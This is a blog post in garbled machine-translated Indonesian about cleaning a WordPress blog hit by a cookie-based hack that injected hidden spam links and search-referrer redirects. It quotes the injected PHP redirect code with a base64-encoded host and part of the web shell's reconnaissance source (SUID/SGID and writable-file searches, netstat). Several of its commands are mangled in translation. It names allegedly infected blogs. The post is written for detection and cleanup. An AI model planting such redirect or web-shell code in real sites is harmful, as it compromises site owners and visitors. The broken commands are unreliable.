Pada bulan lalu, saya telah menerima peringatan blog virus dalam beberapa pengunjung. Awalnya saya mengabaikan peringatan, karena saya memasang antivirus yang cukup bagus (Kaspersky AV 2009) Dan meskipun blog untuk waktu yang lama, aku tidak pernah mendapat peringatan virus (.. Aku melihat sesuatu yang mencurigakan sebelumnya bahwa refresh yang pertama menghilang. Akhirnya ...).
Perlahan-lahan mulai muncul variasi yang besar lalu lintas pengunjungSetelah itu lalu lintas akhir-akhir ini telah jatuh mantap dan mulai lebih banyak orang yang mengatakan bahwa stealthsettings.com sekarang virused. Kemarin saya menerima dari seseorang screenshot dilakukan ketika antivirus diblokir naskah dari stealthsettings.com:Trojan-Clicker.HTML.IFrame.gr. Itu cukup meyakinkan saya, bahwa saya menempatkan semua sumber dicari. Ide pertama yang datang ke pikiran saya adalah untuk melakukan meningkatkan versi terbaru dari WordPress (2.5.1), tetapi tidak sebelum menghapus semua file dalam skrip lama WordPress dan untuk membuat backup database. Prosedur ini tidak berhasil dan mungkin butuh waktu lama bagi saya untuk mencari tahu di mana bug itu, jika tidak memberi tahu saya. Eugen dalam sebuah diskusi sambil minum kopi, ia menemukan link Google dan itu akan baik untuk melihat dia.
MyDigitalLife.info, menerbitkan sebuah artikel berjudul: “WordPress Peretasan: Pulihkan dan Perbaiki Google dan Mesin Pencari atau Tanpa Lalu Lintas Cookie Dialihkan ke Your-Needs.info, AnyResults.Net, Golden-Info.net, dan Situs Ilegal Lainnya"Itu adalah akhir dari thread yang saya butuhkan.
Ini adalah tentang mengeksploitasi de WordPress berdasarkan cookie, Yang saya pikir sangat kompleks dan membuat buku. Cukup pintar untuk membuat SQL Injection Database blog, untuk membuat user tak terlihat pemeriksaan rutin sederhana Menu Utama->pengguna, memeriksa direktori dan file server yang "ditulis" (itu chmod 777), untuk mencari dan untuk menjalankan file dengan privileges dari user root atau kelompok. Saya tidak tahu siapa yang mengeksploitasi nama dan melihat bahwa ada beberapa artikel yang ditulis tentang dia, meskipun fakta bahwa banyak blog yang terinfeksi, termasuk Rumania. Ok ... Saya akan mencoba untuk mencoba menjelaskan generalisasi tentang virus.
Apa virus?
Pertama, masukkan halaman sumber untuk blog, link yang tak terlihat oleh pengunjung tetapi terlihat dan diindeks untuk mesin pencari, terutama Google. Dengan cara ini mentransfer peringkat halaman untuk situs yang ditunjukkan oleh penyerang. Kedua, yang lain dimasukkan kode redirection URL untuk pengunjung yang datang dari Google, Hidup, Yahoo, ... atau RSS reader dan tidak situs kue. A antivirus mendeteksi redirect sebagai Trojan-Clicker.HTML.
Gejala:
Penurunan besar dalam lalu lintas pengunjung, Terutama di blog mana sebagian besar pengunjung datang dari Google.
Identifikasi: (di sinilah masalahnya menjadi rumit bagi mereka yang tidak tahu banyak tentang phpmyadmin, php dan linux)
LA. PERHATIAN! Pertama buat backup database!
1. Periksa file sumber index.php, header.php, footer.php, The topik blog dan melihat apakah ada kode yang menggunakan enkripsi base64 atau berisi “if ($ ser ==” 1? && sizeof ($ _ COOKIE) == 0) ”pada form:
<?php
$seref=array(”google”,”msn”,”live”,”altavista”,
”ask”,”yahoo”,”aol”,”cnn”,”weather”,”alexa”);
$ser=0; foreach($seref as $ref)
if(strpos(strtolower
($_SERVER[’HTTP_REFERER’]),$ref)!==false){ $ser=”1?; break; }
if($ser==”1? && sizeof($_COOKIE)==0){ header(”Location: http://”.base64_decode(”YW55cmVzdWx0cy5uZXQ=”).”/”); exit;
}?>Atau ... sesuatu. Hapus kode ini!
Klik pada gambar ...
Pada tangkapan layar di atas saya tidak sengaja memilih dan " ". Kode itu harus tetap ada.
2. Menggunakan phpMyAdmin dan pergi ke tabel database wp_usersDimana memeriksa apakah ada nama pengguna yang dibuat pada 00:00:00 0000-00-00 (Kemungkinan penempatan user_login untuk menulis "WordPress”. Catat ID pengguna ini (bidang ID) lalu hapus.
Klik pada gambar ...
* Garis hijau harus dihapus dan mempertahankan identitasnya. Dalam kasus sepiApakah ID = 8 .
3. Pergi ke Tabel wp_usermeta, Dimana terletak dan menghapus baris untuk ID (di mana lapangan user_id Nilai ID muncul dihapus).
4. Pada Tabel wp_option, Go active_plugins dan melihat apa plugin diaktifkan tersangka. Hal ini dapat digunakan seperti akhiran _old.giff, _old.pngg, _old.jpeg, _new.php.giff, dll. kombinasi dari ekstensi gambar yang kaya dengan _old dan _new.
SELECT * FROM wp_options WHERE option_name = 'active_plugins'Hapus plugin ini, lalu buka blog -> Dashboard -> Plugins, tempat Anda menonaktifkan dan mengaktifkan plugin apa pun.
Klik pada gambar untuk melihat tampak active_plugins file virus.
Ikuti jalan di FTP atau SSH, ditunjukkan dalam active_plugins dan menghapus file dari server.
5. Semua dalam phpMyAdmin, pada Tabel wp_option, Cari dan hapus baris yang berisi "rss_f541b3abd05e7962fcab37737f40fad8"Dan di antara"internal_links_cache ".
Dalam internal_links_cache dibuat link spam terenkripsi yang muncul di blog Anda dan kode dari Google Adstengkuk, The hacker.
6. Rekomendasi adalah untuk mengubah password Anda Blog dan login menghapus semua userele mencurigakan. Tingkatkan ke versi terbaru dari WordPress dan mengatur blog untuk berhenti mendaftarkan pengguna baru. Tidak ada ruginya… mereka juga bisa berkomentar yang tidak berpenghuni.
Saya mencoba di atas untuk menjelaskan sedikit, apa yang harus dilakukan dalam situasi seperti itu, untuk membersihkan blog dari virus ini. Masalahnya jauh lebih serius daripada yang terlihat dan hampir tidak terpecahkan, karena sudah digunakan kerentanan keamanan webserver hosting, yaitu blog.
Sebagai tindakan pertama keamanan, dengan akses SSH, Membuat beberapa pemeriksaan pada server untuk melihat apakah ada file seperti * _old * dan * _new. * Dengan ujung.giff, jpeg,. pngg,. jpgg.. File-file ini harus dihapus. Jika Anda mengganti nama file, misalnya. top_right_old.giff in top_right_old.phpKita melihat bahwa file tersebut persis kode server mengeksploitasi.
Beberapa instruksi berguna untuk memeriksa, membersihkan dan mengamankan server. (melalui SSH)
1. cd / tmp dan memeriksa apakah ada folder seperti tmpVFlma atau kombinasi lain memiliki nama yang sama dan menghapusnya. Lihat gambar di bawah, dua folder tersebut dari saya:
rm-rf foldername
2. Periksa dan hilangkan (ubah chmod-ul) sebanyak mungkin folder dengan atribut chmod 777
temukan semua file yang dapat ditulis dalam direktori saat ini: Cari. -Type f-perm-2-ls
menemukan semua direktori yang dapat ditulis dalam dir saat ini: Cari. -Type d-perm-2-ls
temukan semua direktori dan file yang dapat ditulis dalam direktori saat ini: Cari. -Perm-2-ls
3. Mencari file yang mencurigakan pada server.
find . -name "*_new.php*"
find . -name "*_old.php*"
find . -name "*.jpgg"
find . -name "*_giff"
find . -name "*_pngg"4, PERHATIAN! file-file yang mengatur bit SUID si SGID. File-file ini mengeksekusi dengan privileges dari pengguna (kelompok) atau akar, bukan pengguna yang mengeksekusi file tersebut. File-file ini dapat menyebabkan kompromi root, jika masalah keamanan. Jika Anda menggunakan file dengan bit SUID dan SGID, tampil 'chmod 0 " pada atau uninstall paket yang mengandung mereka.
Exploit mengandung suatu tempat di sumber ...:
if(!$safe_mode){
if($os_type == 'nix'){
$os .= execute('sysctl -n kern.ostype');
$os .= execute('sysctl -n kern.osrelease');
$os .= execute('sysctl -n kernel.ostype');
$os .= execute('sysctl -n kernel.osrelease');
if(empty($user)) $user = execute('id');
$aliases = array(
'' => '',
'find suid files'=>'find / -type f -perm -04000 -ls',
'find sgid files'=>'find / -type f -perm -02000 -ls',
'find all writable files in current dir'=>'find . -type f -perm -2 -ls',
'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',
'find all writable directories and files in current dir'=>'find . -perm -2 -ls',
'show opened ports'=>'netstat -an | grep -i listen',
);
}else{
$os_name .= execute('ver');
$user .= execute('echo %username%');
$aliases = array(
'' => '',
'show runing services' => 'net start',
'show process list' => 'tasklist'
);
}Dengan cara ini ... pada dasarnya menemukan pelanggaran keamanan. Pelabuhan membuka direktori "ditulis" dan grup eksekusi hak file / root.
Kembali dengan lebih ...
Beberapa blog yang terinfeksi: www.blegoo.com, www.visurat.ro,
fulgerica.com, denisuca.com, www.ecostin.com,
www.razvanmatasel.ro,
blog.hrmarket.ro, www.nitza.ro,
sepeda motor.motomag.ro,
emi.brainient.com, www.picsel.ro,
www.mihaidragan.ro/kindablog/,
krumel.seo-point.com, www.itex.ro/blog,
www.radiology.ro,
www.dipse.ro/ionut/,
www.vinul.ro/blog/, www.damaideparte.ro,
dragos.roua.ro, www.artistul.ro/blog/,
www.mirabilismedia.ro/blog, blog.einvest.ro
... Daftar goes on ... banyak.
Anda dapat memeriksa apakah blog terinfeksi menggunakan mesin pencari Google. salin & tempel:
situs www.blegoo.com membeli
Selamat malam dan kerja bagus;) Segera saya pikir Eugen akan datang dengan berita, di prevezibil.imprevizibil.com.
brb :)
PERHATIAN! Mengubah tema WordPress atau tingkatkan ke WordPress 2.5.1, BUKAN solusi untuk menyingkirkan virus ini.
